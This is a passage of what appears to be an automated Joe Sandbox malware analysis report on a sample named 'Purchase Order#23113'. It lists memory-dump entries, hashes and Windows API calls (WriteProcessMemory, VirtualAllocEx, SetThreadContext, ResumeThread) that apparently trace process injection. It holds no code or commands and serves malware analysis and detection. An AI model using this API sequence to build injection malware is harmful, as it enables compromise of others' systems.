                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 6abf8f2c9f726864fd937a703f7b156c1b740618837341613a496d7fefa1a9c2
                                                                            • Instruction ID: b6e5f18d1205e56d299fbf68fd0a34b34e9afd7371ef2294bc29b966ceba87f2
                                                                            • Opcode Fuzzy Hash: 6abf8f2c9f726864fd937a703f7b156c1b740618837341613a496d7fefa1a9c2
                                                                            • Instruction Fuzzy Hash: 6D2124B19003599FCB10CFAAC885BDEBBF5FF48310F14842AE958A7250C779A954CBA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07FB6E90
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 2d0bc43ae5e51f9e960fffa1bff434246968fafabe6e5902f837ad5296db8141
                                                                            • Instruction ID: 0260313e195d83673617e0fe292edccc3ede17f816e91ab94fdd05232572c311
                                                                            • Opcode Fuzzy Hash: 2d0bc43ae5e51f9e960fffa1bff434246968fafabe6e5902f837ad5296db8141
                                                                            • Instruction Fuzzy Hash: 662125B1900259DFCF10CFAAC884BEEBBF1FF48310F14842AE958A7250C7799954CBA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07FB6CE6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: b468520550a8c07b141297096e81c7ab53873248cc5e2f89d08cdb3504b743af
                                                                            • Instruction ID: 6f8fa3befd8187b9d85ed6a9ee67a6d7a759730993bd9be3feefaf7461e22e8b
                                                                            • Opcode Fuzzy Hash: b468520550a8c07b141297096e81c7ab53873248cc5e2f89d08cdb3504b743af
                                                                            • Instruction Fuzzy Hash: 762139B1D002098FDB20DFAAC484BEEBBF4EF89324F148529D459A7291C7789545CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07FB6F70
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: 9cb063b07ff85175a5b59fd60a4b4da96e67c1a420b3531fa00c767ed932c935
                                                                            • Instruction ID: 14b9a9354873c0ac7ebada37f419b14f5f35f29e03722e47eb867889693870b8
                                                                            • Opcode Fuzzy Hash: 9cb063b07ff85175a5b59fd60a4b4da96e67c1a420b3531fa00c767ed932c935
                                                                            • Instruction Fuzzy Hash: AC2128B1D002599FCB10DFAAC840AEEFBF5FF48310F108429E558A7250D738A544CBA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07FB6CE6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: cf7ab54d20910c8b847d630c5f9d2fcd2c4c8cadcea2e4de197a0f0e2f871e68
                                                                            • Instruction ID: b85670d845151fb82ed07278dd062ea37901f84090b0c286588416e94019f511
                                                                            • Opcode Fuzzy Hash: cf7ab54d20910c8b847d630c5f9d2fcd2c4c8cadcea2e4de197a0f0e2f871e68
                                                                            • Instruction Fuzzy Hash: EE2118B1D002098FDB10DFAAC485BEEBBF4EF48324F148429D459A7241CB78A945CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0142D717
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: ac4e3b577e2084cbec4ac3008784f4586e40135676ea6f0609c6084e0e5df721
                                                                            • Instruction ID: fca2700eda6ee865ced87c7754dd9dca50be769e6d50cdc697e58849d07cb482
                                                                            • Opcode Fuzzy Hash: ac4e3b577e2084cbec4ac3008784f4586e40135676ea6f0609c6084e0e5df721
                                                                            • Instruction Fuzzy Hash: 9C21E0B5D00258DFDB10CFA9D984ADEBBF4EB48324F14841AE918B7320C378A940CFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0142D717
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: daee27c01c0538345c4bf3c577a57ab527213dfde6ab81c41eb54be14336998f
                                                                            • Instruction ID: c70e9de2657680b5833b625a9adfac228c8826fca475f960ffb659efafab0ed6
                                                                            • Opcode Fuzzy Hash: daee27c01c0538345c4bf3c577a57ab527213dfde6ab81c41eb54be14336998f
                                                                            • Instruction Fuzzy Hash: 7421B3B59002589FDB10CF9AD584ADEBFF4EB48310F14841AE958A7350D378A954CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0142B079,00000800,00000000,00000000), ref: 0142B28A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0142B079,00000800,00000000,00000000), ref: 0142B28A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07FB6DAE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07FB6DAE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0142AFFE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • PostMessageW.USER32(?,?,?,?), ref: 07FB92FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • PostMessageW.USER32(?,?,?,?), ref: 07FB92FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07FB6F70
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te^q
                                                                            • API String ID: 0-671973202
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te^q
                                                                            • API String ID: 0-671973202
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te^q
                                                                            • API String ID: 0-671973202
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b74ef9db24bdf63c7a741c1a9d31873c1b2b490e0382e546d931bf998a479178
                                                                            • Instruction ID: ca9c07597354a343246f45ebcc736bfd47214a04cdf32e4ba38b4953fb2a6cb2
                                                                            • Opcode Fuzzy Hash: b74ef9db24bdf63c7a741c1a9d31873c1b2b490e0382e546d931bf998a479178
                                                                            • Instruction Fuzzy Hash: F841C078E112199FCB00DFA9D484AEEBBF2FB48320F149555E811A3354D735A995CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f67a3f80d880b666c2ab435f80f82cf4c99587c1291590d013ecc9a11ea6d102
                                                                            • Instruction ID: 6c6b6809c748fd11b14f8ca4e004d51f2d2f8715c16d15c60d3f7daa8269a16a
                                                                            • Opcode Fuzzy Hash: f67a3f80d880b666c2ab435f80f82cf4c99587c1291590d013ecc9a11ea6d102
                                                                            • Instruction Fuzzy Hash: 2C41BC719043889FCB00DFA9D845A9EBFF5EF49310F0484AAE949E7251C739A804CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 271248150c56abdee6a9975f7f6c56a2f13b402275bee6edf668266496d603be
                                                                            • Instruction ID: 83abc4b99da0b958ef5f6b978b215ad255c6f63044ac44752ca78888feee7699
                                                                            • Opcode Fuzzy Hash: 271248150c56abdee6a9975f7f6c56a2f13b402275bee6edf668266496d603be
                                                                            • Instruction Fuzzy Hash: B94178B4E5020ADFCB04CFA5D945AAEFBF2FB88300F10D5AAD815A7250D778AA00CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 47c88bfc658eb713989351190477af7950e3b15c9252c0674430fd3bcc666b19
                                                                            • Instruction ID: 0023f0d9a6dc5a2eade5a20333d2dbcdfc3fd9ab7d4546276e475a078a96a8b1
                                                                            • Opcode Fuzzy Hash: 47c88bfc658eb713989351190477af7950e3b15c9252c0674430fd3bcc666b19
                                                                            • Instruction Fuzzy Hash: 0241E674E002199FDB44DFA9D480AEEBBF2FF88314F149069E805A7355DB39A846CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 985b7142c0339f51d703f6bf50e084a84573f7c06732ca8e9b92e1d7dc2d6cea
                                                                            • Instruction ID: 756ffb0b492a7d897eff563b3752bb951ccf16bed4bca44c25da2e7c63f97d5d
                                                                            • Opcode Fuzzy Hash: 985b7142c0339f51d703f6bf50e084a84573f7c06732ca8e9b92e1d7dc2d6cea
                                                                            • Instruction Fuzzy Hash: 35411474E04209DBCF04CFA9D9445EEFBB6FB88200F1084AAE915B7344DB386A41CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: afdfceab8d22ef8b078482cc724515a3c46dc2bf2a8aed6b1537308230f8e83b
                                                                            • Instruction ID: 42204ea72eafdf859fbee128ddb0fd872e70b917dd40c9df64eee5ed5ee3349d
                                                                            • Opcode Fuzzy Hash: afdfceab8d22ef8b078482cc724515a3c46dc2bf2a8aed6b1537308230f8e83b
                                                                            • Instruction Fuzzy Hash: 95413674E04209DBCF04CFA9D9456EEFBB2FB88210F10846AE815B7244DB786A41CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2add01a6c6ff22383d89e26d2499941e83c3dcd1d087f2ccafc213b5becdb2bd
                                                                            • Instruction ID: 847f66582c080c40c930c3e5c12d09987c160dc54c93acc1ac4668daea6ad365
                                                                            • Opcode Fuzzy Hash: 2add01a6c6ff22383d89e26d2499941e83c3dcd1d087f2ccafc213b5becdb2bd
                                                                            • Instruction Fuzzy Hash: 66311870E04209DFDB48DFAAC5446AEBBB2FF89300F14D5AAD406A7290DB34AA40CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c66fe3b361b27ada3a3a29f7331cf2944cb8ed66ae7e8af24169f83a7283ee8a
                                                                            • Instruction ID: 0f0d0d343b5346c99bbb22989445f223730d9af69a22f73f631e413ceb4db567
                                                                            • Opcode Fuzzy Hash: c66fe3b361b27ada3a3a29f7331cf2944cb8ed66ae7e8af24169f83a7283ee8a
                                                                            • Instruction Fuzzy Hash: E221062645ABF05AE702BF6CE9B12D67FA09F52225F0540A3C1C48D077D94984DEC2EE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 431ce143de8a215c61003ccc4f719c4a6b4be3fb627af48863f6b8c831a9a48d
                                                                            • Instruction ID: 1e491137c3a49fd3c9d48149442c6dada7ddbe6f6c25b11f97fbfb3f4c8a3c29
                                                                            • Opcode Fuzzy Hash: 431ce143de8a215c61003ccc4f719c4a6b4be3fb627af48863f6b8c831a9a48d
                                                                            • Instruction Fuzzy Hash: DE312674E1560ADFCB48CFA9D9455AEBFF2FB88200F10C4AA9805E7344EB345A418B95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769843698.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_13dd000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8b0f5d1514423aa1323a7657c043aff3f87509e2b2f00e47d688fbd73b2bbe2a
                                                                            • Instruction ID: 2ed579438782dd83e805099dff40a12e95663d53f8235ce356660f1741eb3630
                                                                            • Opcode Fuzzy Hash: 8b0f5d1514423aa1323a7657c043aff3f87509e2b2f00e47d688fbd73b2bbe2a
                                                                            • Instruction Fuzzy Hash: 74212272604204DFCB15DF68E984B26BFA5FBC8318F20C56DE80A4B296C33AD447CA61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6f14f0bd4ffa40c9c1ce6a0e203b3ae87ca8f62ea8b0fab7b78a463c122702f8
                                                                            • Instruction ID: 31c9faa2365ae357bd487072b995ae069f6a62913c70da44218a4d696820c007
                                                                            • Opcode Fuzzy Hash: 6f14f0bd4ffa40c9c1ce6a0e203b3ae87ca8f62ea8b0fab7b78a463c122702f8
                                                                            • Instruction Fuzzy Hash: C4211474E1520ADFCB48CFAAD5445AEBBF6FB88200F10C4AA9805E7344EB346A419B95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7c4d0d9cfefba142afe4c0c06036b6789432955004a08b5c324fd2a936dd7669
                                                                            • Instruction ID: f032ad0d5a049fdce8664cb8a7b89f22f208751855e83523390c88cb67314a65
                                                                            • Opcode Fuzzy Hash: 7c4d0d9cfefba142afe4c0c06036b6789432955004a08b5c324fd2a936dd7669
                                                                            • Instruction Fuzzy Hash: BF31C0B0D11218AFDB20DF99C588B9EBFF5FB08314F248069E408BB250C7B96885CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2e6bc6cc30eb6e6b9e8d5e07609c7d8c2c4271a9c68392751884b160077496df
                                                                            • Instruction ID: 12c0cf029788217917630f9a5971b6eec203296b3b888e3fd8365f76b1c43419
                                                                            • Opcode Fuzzy Hash: 2e6bc6cc30eb6e6b9e8d5e07609c7d8c2c4271a9c68392751884b160077496df
                                                                            • Instruction Fuzzy Hash: 7C2119B5E00209EFCB41DFA5D881A9EBFB1FF48300F1080AAE805A7250D7309B51DF94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d807633dc06d1a9e52b7e5ddabd7f48fe32b0fecd76eee4d8cffe4be9df18946
                                                                            • Instruction ID: f457f031e9a7d06afa266c9735f9f239958b6c7de7d90bacc6d5fe8dba3b975d
                                                                            • Opcode Fuzzy Hash: d807633dc06d1a9e52b7e5ddabd7f48fe32b0fecd76eee4d8cffe4be9df18946
                                                                            • Instruction Fuzzy Hash: D721C474E10209EFCB41DFA9D982A9EBBB1FB48300F1081A5E909A7251DB70AB51DF94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f4d0000dc081472c187f48399e34da59cdab6c0e2c1e69143d63b7eefab1c114
                                                                            • Instruction ID: 92b0a4ff5e3470004ce97538336e3aaf7e217708d6cb4352c0370dbc06f5ca5c
                                                                            • Opcode Fuzzy Hash: f4d0000dc081472c187f48399e34da59cdab6c0e2c1e69143d63b7eefab1c114
                                                                            • Instruction Fuzzy Hash: 0021A674A10A08DFD744CF5AE285999BBF5FF8C310B6280D4E849AB365DB31EE11DB04
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b5d3b67c5a6f4a931bfcf22b95d8438de4af9439863f12c2faf6d780e868007
                                                                            • Instruction ID: 1557915563b27ea1e94a9f8998ba35f65a65047496604e72f128c2a1b8d69d4f
                                                                            • Opcode Fuzzy Hash: 2b5d3b67c5a6f4a931bfcf22b95d8438de4af9439863f12c2faf6d780e868007
                                                                            • Instruction Fuzzy Hash: E511A371B006169B9B11EAB99884ABFBBFBFFC4260B144529E815E7340EF34ED0547A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769843698.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_13dd000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d41474449021aba6c1261ce4e4829ad3fa408ae4abebaec4f5eebd36ff9ac012
